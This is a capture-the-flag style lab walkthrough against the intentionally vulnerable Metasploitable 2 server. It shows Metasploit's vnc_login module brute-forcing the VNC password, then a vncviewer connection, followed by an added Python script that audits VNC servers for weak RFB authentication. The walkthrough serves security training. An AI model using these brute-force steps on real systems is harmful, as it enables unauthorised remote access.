Metasploitable 2 Server: Capture VNC session

Goal: establishing a VNC session to the Metasploitable 2 server.


1. To establish a VNC session we first have to find out the VNC password. So let me fire up the Metasploit Framework and search for vnc 3.3 (the VNC version identified earlier by the Nmap scan):

┌─[mrdev@mr-dev]─[~]
└──╼ $sudo msfdb init && sudo msfconsole
[sudo] password for mrdev: 
[i] Database already started
[i] The database appears to be already configured, skipping initialization
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Search can apply complex filters such as 
search cve:2009 type:exploit, see all the filters 
with help search

msf6 > search vnc 3.3

Matching Modules
================

   #  Name                                 Disclosure Date  Rank     Check  Description
   -  ----                                 ---------------  ----     -----  -----------
   0  exploit/windows/vnc/realvnc_client   2001-01-29       normal   No     RealVNC 3.3.7 Client Buffer Overflow
   1  auxiliary/scanner/vnc/vnc_login                      normal   No     VNC Authentication Scanner
   2  exploit/windows/vnc/winvnc_http_get  2001-01-29       average  No     WinVNC Web Server GET Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/vnc/winvnc_http_get

msf6 >

2. There is an auxiliary module available for brute-forcing the VNC password. Select that module and show its options to see what needs to be configured:

msf6 > use 1
msf6 auxiliary(scanner/vnc/vnc_login) > options 

Module options (auxiliary/scanner/vnc/vnc_login):

   Name              Current Setting                      Required  Description
   ----              ---------------                      --------  -----------
   BLANK_PASSWORDS   false                                no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                    yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                 no        Skip existing credentials stored in the current database (Acce
                                                                    pted: none, user, user&realm)
   PASSWORD                                               no        The password to test
   PASS_FILE         /usr/share/metasploit-framework/dat  no        File containing passwords, one per line
                     a/wordlists/vnc_passwords.txt
   Proxies                                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                 yes       The target host(s), see https://github.com/rapid7/metasploit-f
                                                                    ramework/wiki/Using-Metasploit
   RPORT             5900                                 yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                yes       Stop guessing when a credential works for a host
   THREADS           1                                    yes       The number of concurrent threads (max one per host)
   USERNAME          <BLANK>                              no        A specific username to authenticate as
   USERPASS_FILE                                          no        File containing users and passwords separated by space, one pa
                                                                    ir per line
   USER_AS_PASS      false                                no        Try the username as the password for all users
   USER_FILE                                              no        File containing usernames, one per line
   VERBOSE           true                                 yes       Whether to print output for all attempts

msf6 auxiliary(scanner/vnc/vnc_login) >

3. From the options we only need to set RHOSTS (there is no need to set a wordlist, because PASS_FILE already defaults to Metasploit's vnc_passwords.txt):

msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.56.3:5900     - 192.168.56.3:5900 - Starting VNC login sweep
[+] 192.168.56.3:5900     - 192.168.56.3:5900 - Login Successful: :password
[*] 192.168.56.3:5900     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) > 

The auxiliary module execution succeeded and we have found the password: the Login Successful line reports a blank username followed by the password, "password" (the part after the colon).

4. Now run the below command to start the VNC session:

┌─[mrdev@mr-dev]─[~]
└──╼ $vncviewer 192.168.56.3

TigerVNC Viewer 64-bit v1.11.0
Built on: 2021-03-22 21:21
Copyright (C) 1999-2020 TigerVNC Team and many others (see README.rst)
See https://www.tigervnc.org for information on TigerVNC.

Thu Jan 20 19:57:12 2022
 DecodeManager: Detected 4 CPU core(s)
 DecodeManager: Creating 4 decoder thread(s)
 CConn:       Connected to host 192.168.56.3 port 5900
 CConnection: Server supports RFB protocol version 3.3
 CConnection: Using RFB protocol version 3.3

A pop-up window appears and prompts me to enter the password:

If the authentication is successful you can see the GUI of the Metasploitable 2 server:
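A check a defender can run against their own VNC listeners, added here as an example that is not code from the original post: it performs the same RFB version and security-type exchange the TigerVNC log above shows and flags servers whose only authentication is the RFB 3.3 challenge/response (or none), which is exactly what makes the vnc_login sweep work. The function names, the socketpair-based stand-in server and demo_offline are all constructed for this example.

```python
# Added example (not from the original post): audit the RFB handshake shown in
# the TigerVNC log above and flag listeners whose only authentication is the
# RFB 3.3 DES challenge (<= 8 password chars, no lockout) or no auth at all.
import socket, struct, threading

VERSION_33 = b"RFB 003.003\n"
SECURITY_NAMES = {0: "failed", 1: "none", 2: "vnc-auth"}  # per the RFB spec


def audit_rfb(sock):
    """Read the version and offered security types over a connected socket."""
    banner = sock.recv(12)
    if len(banner) != 12 or not banner.startswith(b"RFB "):
        return {"rfb": False, "banner": banner}
    major, minor = int(banner[4:7]), int(banner[8:11])
    sock.sendall(banner)  # echo the version so the server keeps its own flow
    if (major, minor) == (3, 3):  # 3.3: server picks one type, sent as a U32
        types = [struct.unpack(">I", sock.recv(4))[0]]
    else:  # 3.7+: U8 count, then that many U8 security types
        count = sock.recv(1)[0]
        types = list(sock.recv(count)) if count else [0]
    return {"rfb": True, "version": f"{major}.{minor}",
            "security_types": [SECURITY_NAMES.get(t, f"type-{t}") for t in types],
            # weak: nothing stronger than no-auth or the legacy DES challenge
            "weak_auth": all(t in (1, 2) for t in types)}


def audit_vnc(host, port=5900, timeout=3.0):
    """Audit a VNC port on a host you administer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return audit_rfb(s)


def _fake_server(peer, sectype):
    """Constructed RFB 3.3 server stand-in for offline testing."""
    with peer:
        peer.sendall(VERSION_33)
        peer.recv(12)
        peer.sendall(struct.pack(">I", sectype))


def demo_offline(sectype=2):
    """Run the audit against the stand-in over a socketpair (no network)."""
    client, server = socket.socketpair()
    t = threading.Thread(target=_fake_server, args=(server, sectype))
    t.start()
    with client:
        result = audit_rfb(client)
    t.join()
    return result
```

demo_offline() reproduces the Metasploitable 2 case (version 3.3, vnc-auth, weak_auth True); a real listener is checked with audit_vnc(host).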
